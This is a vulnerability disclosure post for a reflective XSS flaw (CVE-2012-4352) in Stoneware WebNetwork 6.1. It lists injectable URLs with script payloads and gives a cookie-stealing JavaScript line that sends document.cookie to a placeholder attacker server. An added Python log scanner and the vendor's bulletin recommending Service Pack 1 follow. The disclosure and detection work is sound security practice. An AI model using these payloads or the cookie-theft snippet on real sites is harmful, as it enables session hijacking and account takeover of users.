Friday, October 19, 2012

Stoneware WebNetwork 6.1 Reflective XSS (CVE-2012-4352)

#Title: HELP! My cookiez beenz 8ted…
##CVE-2012-4352
###Vulnerability: Reflective XSS
####Vulnerable/Tested Software: Stoneware WebNetwork 6.1
#####Discovered 8/2012 Exploited by: Jacob Holcomb/G#42


Injected Javascript Payload:
https://$SERVER/community/blog.jsp?blogName=%3E%3Cscript%3Ealert%28%27x42%27%29%3C/script%3E&post=1


Vulnerable URL:
https://$SERVER/community/calendar.jsp?calendarType=(XSS_HERE)

Injected Javascript Payload:
https://$SERVER/community/calendar.jsp?calendarType=%3E%3Cscript%3Ealert%28%2700101010%27%29%3C/script%3E


Vulnerable URL:
https://$SERVER/community/blogSearch.jsp?blogName=(XSS_HERE)

Injected Javascript Payload:
https://$SERVER/community/blogSearch.jsp?blogName=><script>alert('G42')</script>


Vulnerable URL:
https://$SERVER/swDashboard/ajax/setAppFlag.jsp?app=CommunityFlags&flag=(XSS_HERE)&value=

Injected Javascript Payload:
https://$SERVER/swDashboard/ajax/setAppFlag.jsp?app=CommunityFlags&flag=%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&value=


Vulnerable URL:
https://$SERVER/community/calendar.jsp?monthNumber=(XSS_HERE)

Injected Javascript Payload:
https://$SERVER/community/calendar.jsp?monthNumber=><script>alert('G42')</script>


Cookiez Nom NOm NOMz: - /*insert script into XSS injection point w/ script tags*/
var url = "http://Evil_ServerIPv4:2103/pwnd.php?"; var cookie = document.cookie; theft = url.concat(cookie); new Image().src= theft;
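
For defenders reviewing access logs from a webNetwork 6.1 host that has not yet received Service Pack 1, the following added example (not part of the original post and not Stoneware's code) flags requests to the endpoints listed above whose affected parameter decodes to markup characters, including double-encoded values. It assumes combined-format access logs; the sample log lines and the names `AFFECTED`, `scan` and `decode_fully` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint -> parameters this advisory lists as injection points.
AFFECTED = {
    "/community/blog.jsp": {"blogName"},
    "/community/blogSearch.jsp": {"blogName"},
    "/community/calendar.jsp": {"calendarType", "monthNumber"},
    "/swDashboard/ajax/setAppFlag.jsp": {"flag"},
}
MARKUP = re.compile(r'[<>"]')  # characters that allow breaking out into HTML
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding such as %253C, a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_no, path, param, decoded_value) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        path = target.path.split(";")[0]  # drop a ;jsessionid=... suffix
        params = AFFECTED.get(path, set())
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = decode_fully(raw)
            if name in params and MARKUP.search(value):
                hits.append((line_no, path, name, value))
    return hits

SAMPLE_LOG = [  # constructed entries, not real traffic
    '192.0.2.10 - - [12/Sep/2012:09:14:02 -0400] "GET /community/calendar.jsp?monthNumber=9 HTTP/1.1" 200 5120',
    '192.0.2.23 - - [12/Sep/2012:09:15:40 -0400] "GET /community/calendar.jsp?calendarType=%3E%3Cscript%3Ealert%28%2700101010%27%29%3C/script%3E HTTP/1.1" 200 5333',
    '192.0.2.23 - - [12/Sep/2012:09:16:05 -0400] "GET /swDashboard/ajax/setAppFlag.jsp?app=CommunityFlags&flag=%253Cb%253E&value= HTTP/1.1" 200 17',
    '192.0.2.31 - - [12/Sep/2012:09:17:11 -0400] "GET /community/blogSearch.jsp?blogName=staff+news HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that markup reached one of these parameters; whether it was reflected depends on whether the host was already running Service Pack 1 at the time of the request.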




webNetwork Security Bulletin September 12, 2012
http://www2.lanschool.com/e/2262/-Security20Bulletin206-1-0-pdf/xf392/581253021



Stoneware Security Bulletin
September 12, 2012 


Summary

This security bulletin is provided to notify customers of security vulnerabilities within the webNetwork product. Stoneware has released webNetwork 6.1 Service Pack 1 to address these issues. The vulnerabilities could allow for unintended information disclosure and breach of user accounts. The impact of exploitation of these vulnerabilities depends on the sensitivity of the content contained within webNetwork. This vulnerability can allow for arbitrary execution of supplied JavaScript, which could be used to exploit vulnerabilities within a web browser, such as malicious code execution.


Vulnerability Information

ID: CVE-2012-4352
Description: Users vulnerable to cross-site scripting (XSS)
Maximum Security Impact: Information Disclosure / Breach of user account
Severity Rating: Important


Recommendation
Stoneware recommends that customers upgrade to webNetwork 6.1 Service Pack 1 at the earliest opportunity. 

Acknowledgements
Stoneware would like to thank Jacob Holcomb of Leland Public Schools for reporting CVE-2012-4352. 

Disclaimer
The information provided by Stoneware in this bulletin and in the Stoneware Knowledge Base is provided "as is" without warranty of any kind. Stoneware disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Stoneware, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Stoneware, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 

Revisions
1.0, 2012-September-12, Bulletin published.

